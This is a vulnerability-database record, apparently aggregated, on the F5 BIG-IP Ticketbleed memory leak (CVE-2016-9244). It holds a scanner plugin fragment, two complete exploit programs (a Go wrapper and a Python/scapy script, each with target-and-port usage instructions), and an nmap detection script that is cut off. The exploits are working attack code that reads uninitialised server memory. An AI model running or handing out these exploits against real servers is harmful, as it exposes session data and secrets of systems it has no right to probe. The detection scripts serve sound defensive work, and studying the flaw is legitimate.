ciphers['TLS1_RSA_WITH_AES_128_CBC_SHA256'] +\n ciphers['TLS1_RSA_WITH_AES_256_CBC_SHA256'] +\n ciphers['TLS1_DHE_RSA_WITH_AES_128_CBC_SHA256'] +\n ciphers['TLS1_DHE_RSA_WITH_AES_256_CBC_SHA256']\n);\n\nif (result[0] == TRUE)\n{\n security_report_v4(\n port:port,\n severity:SECURITY_WARNING,\n extra:result[2]\n );\n}\nelse\n{\n exit(0, \"Port \" + port + \": \" + result[2]);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:14", "description": "\nF5 BIG-IP SSL Virtual Server - Ticketbleed Memory Disclosure", "edition": 1, "published": "2017-02-10T00:00:00", "title": "F5 BIG-IP SSL Virtual Server - Ticketbleed Memory Disclosure", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-9244"], "modified": "2017-02-10T00:00:00", "id": "EXPLOITPACK:EE5EA4ECE0C61538EC30487A371A1C90", "href": "", "sourceData": "/*\n# Exploit Title: [Ticketbleed (CVE-2016-9244) F5 BIG-IP SSL virtual server Memory Leakage]\n# Date: [10.02.2017]\n# Exploit Author: [Ege Balc\u00c4\u00b1]\n# Vendor Homepage: [https://f5.com/]\n# Version: [12.0.0 - 12.1.2 && 11.4.0 - 11.6.1]\n# Tested on: [Multiple]\n# CVE : [CVE-2016-9244]\n\n\n\n\nBUILD:\n\tgo get github.com/EgeBalci/Ticketbleed\n\tgo build Ticketbleed.go\n\nUSAGE:\n\t./ticketbleed <options> <ip:port>\nOPTIONS:\n\t-o, --out \tOutput filename for raw memory\n\t-s, --size \tSize in bytes to read\n\t-h, --help \tPrint this message\n\n*/\npackage main\n\nimport \"github.com/EgeBalci/Ticketbleed\"\nimport \"strconv\"\nimport \"strings\"\nimport \"fmt\"\nimport \"os\"\n\n\nvar OutputFile string = \"\"\nvar BleedSize int = 0\n\nfunc main() {\n\n\n\tARGS := os.Args[1:]\n\tif len(ARGS) < 1 || len(ARGS) > 5{\n\t\tfmt.Println(Help)\n\t\tos.Exit(1)\n\t}\n\n \tfor i := 0; i < len(ARGS); i++{\n\n\t\tif ARGS[i] == \"-h\" || ARGS[i] == \"--help\"{\n\t\t\tfmt.Println(Help)\n\t\t\tos.Exit(1)\n\t \t}\n\n\t\tif ARGS[i] == \"-o\" || ARGS[i] == \"--out\"{\n\t\t\tOutputFile = ARGS[i+1]\n\t \t}\n\n\t \tif ARGS[i] == \"-s\" || ARGS[i] == \"--size\"{\n\t \t\tSize,err := strconv.Atoi(ARGS[i+1])\n\t \t\tif err != nil {\n\t \t\t\tfmt.Println(\"[-] ERROR: Invalid size value !\")\n\t \t\t\tos.Exit(1)\n\t \t\t}\n\t \t\tif Size < 0 {\n\t \t\t\tfmt.Println(\"[-] ERROR: Size can't be smaller than 0\")\n\t \t\t\tos.Exit(1)\n\t \t\t}else{\n\t \t\t\tBleedSize = Size\n\t \t\t}\n\t \t}\n \t}\n\n\tif OutputFile != \"\" {\n\t\tFile, FileErr := os.Create(OutputFile)\n\t\tif FileErr != nil {\n\t\t\tfmt.Println(\"[-] ERROR: While creating output file !\")\n\t\t\tos.Exit(1)\n\t\t}\n\t\tFile.Close()\n\t\tfmt.Println(\"[*] Output file: \"+OutputFile)\n\t}\n\n \tVulnStatus := Ticketbleed.Check(ARGS[0])\t\t\t\t\t\t\t\t// First check if it's vulnerable\n \tfmt.Println(VulnStatus)\n \tif strings.Contains(VulnStatus, \"[+]\") {\n \t\t\n \t\tgo Ticketbleed.Exploit(ARGS[0], OutputFile, (BleedSize/2)) \t\t// With using multiple threads it is easyer to move on stack\n \t\tTicketbleed.Exploit(ARGS[0], OutputFile, (BleedSize/2))\t\t\t\t// Othervise server echoes back alot of duplicate value\n \t}\n\n}\n\n\n\nvar Help string = `\n\u00e2\u2013\u201e\u00e2\u2013\u201e\u00e2\u2013\u201e\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u201c \u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u201c \u00e2\u2013\u201e\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u201e \u00e2\u2013\u02c6\u00e2\u2013\u02c6 \u00e2\u2013\u201e\u00e2\u2013\u02c6\u00e2\u2013\u20ac\u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u201e\u00e2\u2013\u201e\u00e2\u2013\u201e\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u201c \u00e2\u2013\u201e\u00e2\u2013\u201e\u00e2\u2013\u201e\u00e2\u2013\u201e \u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u201c \u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6 \u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6 \u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u201e \n\u00e2\u2013\u201c \u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019 \u00e2\u2013\u201c\u00e2\u2013\u2019\u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019\u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u20ac \u00e2\u2013\u20ac\u00e2\u2013\u02c6 \u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u201e\u00e2\u2013\u02c6\u00e2\u2013\u2019 \u00e2\u2013\u201c\u00e2\u2013\u02c6 \u00e2\u2013\u20ac\u00e2\u2013\u201c \u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019 \u00e2\u2013\u201c\u00e2\u2013\u2019\u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u201e \u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019 \u00e2\u2013\u201c\u00e2\u2013\u02c6 \u00e2\u2013\u20ac \u00e2\u2013\u201c\u00e2\u2013\u02c6 \u00e2\u2013\u20ac \u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u20ac \u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u0152\n\u00e2\u2013\u2019 \u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2018 \u00e2\u2013\u2019\u00e2\u2013\u2018\u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019\u00e2\u2013\u2019\u00e2\u2013\u201c\u00e2\u2013\u02c6 \u00e2\u2013\u201e \u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u201e\u00e2\u2013\u2018 \u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6 \u00e2\u2013\u2019 \u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2018 \u00e2\u2013\u2019\u00e2\u2013\u2018\u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019 \u00e2\u2013\u201e\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2018 \u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6 \u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6 \u00e2\u2013\u2018\u00e2\u2013\u02c6\u00e2\u2013\u02c6 \u00e2\u2013\u02c6\u00e2\u2013\u0152\n\u00e2\u2013\u2018 \u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u201c \u00e2\u2013\u2018 \u00e2\u2013\u2018\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2018\u00e2\u2013\u2019\u00e2\u2013\u201c\u00e2\u2013\u201c\u00e2\u2013\u201e \u00e2\u2013\u201e\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019\u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6 \u00e2\u2013\u02c6\u00e2\u2013\u201e \u00e2\u2013\u2019\u00e2\u2013\u201c\u00e2\u2013\u02c6 \u00e2\u2013\u201e\u00e2\u2013\u2018 \u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u201c \u00e2\u2013\u2018 \u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2018\u00e2\u2013\u02c6\u00e2\u2013\u20ac \u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2018 \u00e2\u2013\u2019\u00e2\u2013\u201c\u00e2\u2013\u02c6 \u00e2\u2013\u201e \u00e2\u2013\u2019\u00e2\u2013\u201c\u00e2\u2013\u02c6 \u00e2\u2013\u201e \u00e2\u2013\u2018\u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u201e \u00e2\u2013\u0152\n \u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019 \u00e2\u2013\u2018 \u00e2\u2013\u2018\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2018\u00e2\u2013\u2019 \u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u20ac \u00e2\u2013\u2018\u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019 \u00e2\u2013\u02c6\u00e2\u2013\u201e\u00e2\u2013\u2018\u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019 \u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019 \u00e2\u2013\u2018 \u00e2\u2013\u2018\u00e2\u2013\u201c\u00e2\u2013\u02c6 \u00e2\u2013\u20ac\u00e2\u2013\u02c6\u00e2\u2013\u201c\u00e2\u2013\u2018\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019\u00e2\u2013\u2018\u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019\u00e2\u2013\u2018\u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019\u00e2\u2013\u2018\u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u201c \n \u00e2\u2013\u2019 \u00e2\u2013\u2018\u00e2\u2013\u2018 \u00e2\u2013\u2018\u00e2\u2013\u201c \u00e2\u2013\u2018 \u00e2\u2013\u2018\u00e2\u2013\u2019 \u00e2\u2013\u2019 \u00e2\u2013\u2018\u00e2\u2013\u2019 \u00e2\u2013\u2019\u00e2\u2013\u2019 \u00e2\u2013\u201c\u00e2\u2013\u2019\u00e2\u2013\u2018\u00e2\u2013\u2018 \u00e2\u2013\u2019\u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2019 \u00e2\u2013\u2018\u00e2\u2013\u2018 \u00e2\u2013\u2018\u00e2\u2013\u2019\u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u20ac\u00e2\u2013\u2019\u00e2\u2013\u2018 \u00e2\u2013\u2019\u00e2\u2013\u2018\u00e2\u2013\u201c \u00e2\u2013\u2018\u00e2\u2013\u2018\u00e2\u2013\u2018 \u00e2\u2013\u2019\u00e2\u2013\u2018 \u00e2\u2013\u2018\u00e2\u2013\u2018\u00e2\u2013\u2018 \u00e2\u2013\u2019\u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2019\u00e2\u2013\u2019\u00e2\u2013\u201c \u00e2\u2013\u2019 \n \u00e2\u2013\u2018 \u00e2\u2013\u2019 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2019 \u00e2\u2013\u2018 \u00e2\u2013\u2018\u00e2\u2013\u2019 \u00e2\u2013\u2019\u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2019\u00e2\u2013\u2018\u00e2\u2013\u2019 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2019 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2019 \u00e2\u2013\u2019 \n \u00e2\u2013\u2018 \u00e2\u2013\u2019 \u00e2\u2013\u2018\u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018\u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \n \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \n \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \n\nAuthor: Ege Balci\nGithub: github.com/EgeBalci\n\n\nUSAGE: \n\t./ticketbleed <ip:port> <options> \nOPTIONS:\n\t-o, --out \tOutput filename for raw memory\n\t-s, --size \tSize in bytes to read\n\t-h, --help \tPrint this message\n`\n\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41298.zip", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-01T19:04:14", "description": "\nF5 BIG-IP 11.6 SSL Virtual Server - Ticketbleed Memory Disclosure", "edition": 1, "published": "2017-02-14T00:00:00", "title": "F5 BIG-IP 11.6 SSL Virtual Server - Ticketbleed Memory Disclosure", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-9244"], "modified": "2017-02-14T00:00:00", "id": "EXPLOITPACK:4DF698AC9A73D3D4108BA1E66FD1CF8C", "href": "", "sourceData": "# -*- coding: utf-8 -*-\n#!/usr/bin/python\n# Exploit Title: Ticketbleed\n# Google Dork: n/a\n# Date: Exploit: 02/13/17, Advisory Published: 02/09/17 \n# Exploit Author: @0x00string\n# Vendor Homepage: https://f5.com/\n# Software Link: https://support.f5.com/csp/article/K05121675\n# Version: see software link for versions\n# Tested on: F5 BIGIP 11.6\n# CVE : CVE-2016-9244\n# require: scapy_ssl_tls (https://github.com/tintinweb/scapy-ssl_tls)\nimport re, getopt, sys, socket\nfrom struct import *\ntry:\n from scapy_ssl_tls.ssl_tls import *\nexcept ImportError:\n from scapy.layers.ssl_tls import *\n\ndef banner():\n print '''\n lol ty filippo!\n ty tintinweb!\n 0000000000000\n 0000000000000000000 00\n 00000000000000000000000000000\n 0000000000000000000000000000000\n 000000000 0000000000\n 00000000 0000000000\n 0000000 000000000000\n 0000000 000000000000000\n 000000 000000000 000000\n0000000 000000000 000000\n000000 000000000 000000\n000000 000000000 000000\n000000 00000000 000000\n000000 000000000 000000\n0000000 000000000 0000000\n 000000 000000000 000000\n 0000000000000000 0000000\n 0000000000000 0000000\n 00000000000 00000000\n 00000000000 000000000\n 0000000000000000000000000000000\n 00000000000000000000000000000\n 000 0000000000000000000\n 0000000000000\n @0x00string\nhttps://github.com/0x00string/oldays/blob/master/CVE-2016-9244.py\n'''\n\ndef usage ():\n print (\"python script.py <args>\\n\"\n \" -h, --help: Show this message\\n\"\n \" -a, --rhost: Target IP address\\n\"\n \" -b, --rport: Target port\\n\"\n \"\\n\\n\"\n \"Examples:\\n\"\n \"python script.py -a 10.10.10.10 -b 443\\n\"\n \"python script.py --rhost 10.10.10.10 --rport 8443\")\n exit()\n\ndef pretty (t, m):\n if (t is \"+\"):\n print \"\\x1b[32;1m[+]\\x1b[0m\\t\" + m + \"\\n\",\n elif (t is \"-\"):\n print \"\\x1b[31;1m[-]\\x1b[0m\\t\" + m + \"\\n\",\n elif (t is \"*\"):\n print \"\\x1b[34;1m[*]\\x1b[0m\\t\" + m + \"\\n\",\n elif (t is \"!\"):\n print \"\\x1b[33;1m[!]\\x1b[0m\\t\" + m + \"\\n\",\n\ndef createDump (input):\n d, b, h = '', [], []\n u = list(input)\n for e in u:\n h.append(e.encode(\"hex\"))\n if e == '0x0':\n b.append('0')\n elif 30 > ord(e) or ord(e) > 128:\n b.append('.')\n elif 30 < ord(e) or ord(e) < 128:\n b.append(e)\n\n i = 0\n while i < len(h):\n if (len(h) - i ) >= 16:\n d += ' '.join(h[i:i+16])\n d += \" \"\n d += ' '.join(b[i:i+16])\n d += \"\\n\"\n i = i + 16\n else:\n d += ' '.join(h[i:(len(h) - 0 )])\n pad = len(' '.join(h[i:(len(h) - 0 )]))\n d += ' ' * (56 - pad)\n d += ' '.join(b[i:(len(h) - 0 )])\n d += \"\\n\"\n i = i + len(h)\n return d\n\ndef ticketBleed (rhost, rport):\n h = (rhost,int(rport));\n version = TLSVersion.TLS_1_2\n secret = \"\"\n session_ticket = \"\"\n sid = \"\"\n cipher = TLSCipherSuite.ECDHE_RSA_WITH_AES_256_CBC_SHA\n with TLSSocket(socket.socket(), client=True) as sock:\n sock.connect(h)\n ctx = sock.tls_ctx\n \tpacket = TLSRecord() / TLSHandshake() / TLSClientHello(version=version, cipher_suites=TLS_CIPHER_SUITES.keys(), extensions=[TLSExtension() / TLSExtSessionTicketTLS(data=\"\")])\n sock.sendall(packet)\n sock.recvall()\n \tpacket_ke = TLSRecord(version=version) / TLSHandshake() / ctx.get_client_kex_data()\n packet_ccs = TLSRecord(version=TLSVersion.TLS_1_2) / TLSChangeCipherSpec()\n sock.sendall(TLS.from_records([packet_ke, packet_ccs]))\n sock.sendall(to_raw(TLSFinished(), ctx))\n ret = sock.recvall()\n session_ticket = ret[TLSSessionTicket].ticket\n secret = ctx.master_secret\n #pretty(\"*\", \"ctx 1: \\n\" + str(ctx))\n with TLSSocket(socket.socket(), client=True) as sock:\n sock.connect(h)\n ctx = sock.tls_ctx\n \tpacket = TLSRecord() / TLSHandshake() / TLSClientHello(version=TLSVersion.TLS_1_2, cipher_suites=TLS_CIPHER_SUITES.keys(), session_id=\"A\", extensions=[TLSExtension() / TLSExtSessionTicketTLS(data=session_ticket)])\n sock.tls_ctx.resume_session(secret)\n sock.sendall(packet)\n ret = sock.recvall()\n sid = ret[TLSServerHello].session_id\n #pretty(\"*\", \"ctx 2: \\n\" + str(ctx))\n pretty(\"+\", \"bled 'A' + 31 bytes: \\n\" + createDump(sid))\n\ndef main():\n rhost = None;\n rport = None;\n options, remainder = getopt.getopt(sys.argv[1:], 'a:b:h:', ['rhost=','rport=','help',])\n for opt, arg in options:\n if opt in ('-h', '--help'):\n usage()\n elif opt in ('-a','--rhost'):\n rhost = arg;\n elif opt in ('-b','--rport'):\n rport = arg;\n banner()\n if rhost is None or rport is None:\n usage()\n ticketBleed(rhost,rport)\n exit(0);\n\nif __name__ == \"__main__\":\n main()", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nmap": [{"lastseen": "2019-05-30T17:06:03", "description": "Detects whether a server is vulnerable to the F5 Ticketbleed bug (CVE-2016-9244). \n\nFor additional information: \n\n * https://filippo.io/Ticketbleed/\n * https://blog.filippo.io/finding-ticketbleed/\n * https://support.f5.com/csp/article/K05121675\n\n## Script Arguments \n\n#### tls-ticketbleed.protocols \n\n(default tries all) TLSv1.0, TLSv1.1, or TLSv1.2\n\n#### tls.servername \n\nSee the documentation for the tls library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### mssql.domain, mssql.instance-all, mssql.instance-name, mssql.instance-port, mssql.password, mssql.protocol, mssql.scanned-ports-only, mssql.timeout, mssql.username \n\nSee the documentation for the mssql library. \n\n#### smtp.domain \n\nSee the documentation for the smtp library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n \n \n nmap -p 443 --script tls-ticketbleed <target>\n \n\n## Script Output \n \n \n | tls-ticketbleed:\n | VULNERABLE:\n | Ticketbleed is a serious issue in products manufactured by F5, a popular\n vendor of TLS load-balancers. The issue allows for stealing information from\n the load balancer\n | State: VULNERABLE (Exploitable)\n | Risk factor: High\n | Ticketbleed is vulnerability in the implementation of the TLS\n SessionTicket extension found in some F5 products. It allows the leakage\n (\"bleeding\") of up to 31 bytes of data from uninitialized memory. This is\n caused by the TLS stack padding a Session ID, passed from the client, with\n data to make it 32-bits long.\n | Exploit results:\n | 2ab2ea6a4c167fbe8bf0b36c7d9ed6d3\n | *..jL......l}...\n | References:\n | https://filippo.io/Ticketbleed/\n | https://blog.filippo.io/finding-ticketbleed/\n |_ https://support.f5.com/csp/article/K05121675\n \n\n## Requires \n\n * nmap\n * packet\n * shortport\n * sslcert\n * stdnse\n * table\n * tableaux\n * tls\n * vulns\n * rand\n\n* * *\n", "edition": 14, "published": "2017-02-09T21:30:14", "title": "tls-ticketbleed NSE Script", "type": "nmap", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9244"], "modified": "2018-11-06T15:07:01", "id": "NMAP:TLS-TICKETBLEED.NSE", "href": "https://nmap.org/nsedoc/scripts/tls-ticketbleed.html", "sourceData": "local nmap = require(\"nmap\")\nlocal packet = require \"packet\"\nlocal shortport = require(\"shortport\")\nlocal sslcert = require(\"sslcert\")\nlocal stdnse = require(\"stdnse\")\nlocal table = require(\"table\")\nlocal tableaux = require \"tableaux\"\nlocal tls = require \"tls\"\nlocal vulns = require(\"vulns\")\nlocal rand = require \"rand\"\n\ndescription = [[\nDetects whether a server is vulnerable to the F5 Ticketbleed bug (CVE-2016-9244).\n\nFor additional information:\n* https://filippo.io/Ticketbleed/\n* https://blog.filippo.io/finding-ticketbleed/\n* https://support.f5.com/csp/article/K05121675\n]]\n\n---\n-- @usage\n-- nmap -p 443 --script tls-ticketbleed <target>\n--\n-- @output\n-- | tls-ticketbleed:\n-- | VULNERABLE:\n-- | Ticketbleed is a serious issue in products manufactured by F5, a popular\n-- vendor of TLS load-balancers. The issue allows for stealing information from\n-- the load balancer\n-- | State: VULNERABLE (Exploitable)\n-- | Risk factor: High\n-- | Ticketbleed is vulnerability in the implementation of the TLS\n-- SessionTicket extension found in some F5 products. It allows the leakage\n-- (\"bleeding\") of up to 31 bytes of data from uninitialized memory. This is\n-- caused by the TLS stack padding a Session ID, passed from the client, with\n-- data to make it 32-bits long.\n-- | Exploit results:\n-- | 2ab2ea6a4c167fbe8bf0b36c7d9ed6d3\n-- | *..jL......l}...\n-- | References:\n-- | https://filippo.io/Ticketbleed/\n-- | https://blog.filippo.io/finding-ticketbleed/\n-- |_ https://support.f5.com/csp/article/K05121675\n--\n-- @args tls-ticketbleed.protocols (default tries all) TLSv1.0, TLSv1.1, or TLSv1.2\n\nauthor = \"Mak Kolybabi <mak@kolybabi.com>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\", \"safe\"}\ndependencies = {\"https-redirect\"}\n\nportrule = function(host, port)\n if not tls.handshake_parse.NewSessionTicket then\n stdnse.verbose1(\"Not running: incompatible tls.lua. Get the latest from https://nmap.org/nsedoc/lib/tls.html\")\n return false\n end\n -- Ensure we have the privileges necessary to run the PCAP operations this\n -- script depends upon.\n if not nmap.is_privileged() then\n nmap.registry[SCRIPT_NAME] = nmap.registry[SCRIPT_NAME] or {}\n if not nmap.registry[SCRIPT_NAME].rootfail then\n stdnse.verbose1(\"Not running due to lack of privileges.\")\n end\n\n nmap.registry[SCRIPT_NAME].rootfail = true\n\n return false\n end\n\n return shortport.ssl(host, port) or sslcert.getPrepareTLSWithoutReconnect(port)\nend\n\nlocal function is_vuln(host, port, version)\n -- Checking a host requires a valid TLS Session Ticket. The Nmap API\n -- does not expose that information to us, but it is sent\n -- unencrypted near the end of the TLS handshake.\n --\n -- First we must create a socket that is ready to start a TLS\n -- connection, so that we may find the local port from which it is\n -- sending, and can use that information to filter the PCAP.\n --\n -- We should have a way to specify version here, but we don't.\n local socket\n local starttls = sslcert.getPrepareTLSWithoutReconnect(port)\n if starttls then\n local status\n status, socket = starttls(host, port)\n if not status then\n stdnse.debug3(\"StartTLS connection to server failed: %s\", socket)\n return\n end\n else\n socket = nmap.new_socket()\n local status, err = socket:connect(host, port, \"tcp\")\n if not status then\n stdnse.debug3(\"Connection to server failed: %s\", err)\n return\n end\n end\n\n socket:set_timeout(5000)\n\n -- Find out the port we'll be using in our TLS negotiation.\n local status, _, lport = socket:get_info()\n if( not(status) ) then\n stdnse.debug3(\"Failed to retrieve local port used by socket.\")\n return\n end\n\n -- We are only interested in capturing the TLS responses from the\n -- server, not our traffic. We need to set the snaplen to be fairly\n -- large to accommodate packets with many or large certificates.\n local filter = (\"src host %s and tcp and src port %d and dst port %d\"):format(host.ip, port.number, lport)\n local pcap = nmap.new_socket()\n pcap:set_timeout(5)\n pcap:pcap_open(host.interface, 4096, false, filter)\n\n -- Initiate the TLS negotiation on the already-connected socket, and\n -- then immediately close the socket.\n local status, err = socket:reconnect_ssl()\n if not status then\n stdnse.debug1(\"Can't connect with TLS: %s\", err)\n return\n end\n socket:close()\n\n -- Repeatedly read previously-captured packets and add them to a\n -- buffer.\n local buf = {}\n while true do\n local status, _, _, layer3, _ = pcap:pcap_receive()\n if not status then\n break\n end\n\n -- Parse captured packet and extract data.\n local pkt = packet.Packet:new(layer3, #layer3)\n if not pkt then\n stdnse.debug3(\"Failed to create packet from captured data.\")\n return\n end\n\n if not pkt:tcp_parse() then\n stdnse.debug3(\"Failed to parse captured packet.\")\n return\n end\n\n local tls_data = pkt:raw(pkt.tcp_data_offset)\n table.insert(buf, tls_data)\n end\n\n buf = table.concat(buf, \"\")\n\n pcap:pcap_close()\n pcap:close()\n\n -- Attempt to find the NewSessionTicket record in the captured\n -- packets.\n local pos, ticket\n repeat\n -- Attempt to parse the buffer.\n local record\n pos, record = tls.record_read(buf, pos)\n if not record then\n break\n end\n if record.type ~= \"handshake\" then\n break\n end\n\n -- Search for the NewSessionTicket record, which contains the\n -- Session Ticket we need.\n for _, body in ipairs(record.body) do\n stdnse.debug1(\"Captured %s record.\", body.type)\n if body.type == \"NewSessionTicket\" then\n if body.ticket then\n ticket = body.ticket\n else\n -- If someone downloaded this script separately from Nmap,\n -- they are likely to be missing the parsing changes to the\n -- TLS library. Try parsing the body inline.\n if #body.data <= 4 then\n stdnse.debug1(\"NewSessionTicket's body was too short to parse: %d bytes\", #body.data)\n return\n end\n\n _, ticket = (\">I4 s2\"):unpack(body.data)\n end\n break\n end\n end\n until ticket or pos > #buf\n\n if not ticket then\n stdnse.debug1(\"Server did not send a NewSessionTicket record.\")\n return\n end\n\n -- Create the ClientHello record that triggers the behaviour in\n -- affected systems. The record must include both a Session ID and a\n -- TLS Session Ticket extension.\n --\n -- Setting the Session ID to a 16 bytes allows for the remaining 16\n -- bytes of the field to be filled with uninitialized memory when it\n -- is echoed back in the ServerHelloDone record. Using 16 bytes\n -- reduces the chance of a false positive caused by the server\n -- issuing us a new, valid session ID that just happens to match the\n -- random one we provided.\n local sid_old = rand.random_string(16)\n\n local hello = tls.client_hello({\n [\"protocol\"] = version,\n [\"session_id\"] = sid_old,\n -- Claim to support every cipher\n -- Doesn't work with IIS, but only F5 products should be affected\n [\"ciphers\"] = tableaux.keys(tls.CIPHERS),\n [\"compressors\"] = {\"NULL\"},\n [\"extensions\"] = {\n -- 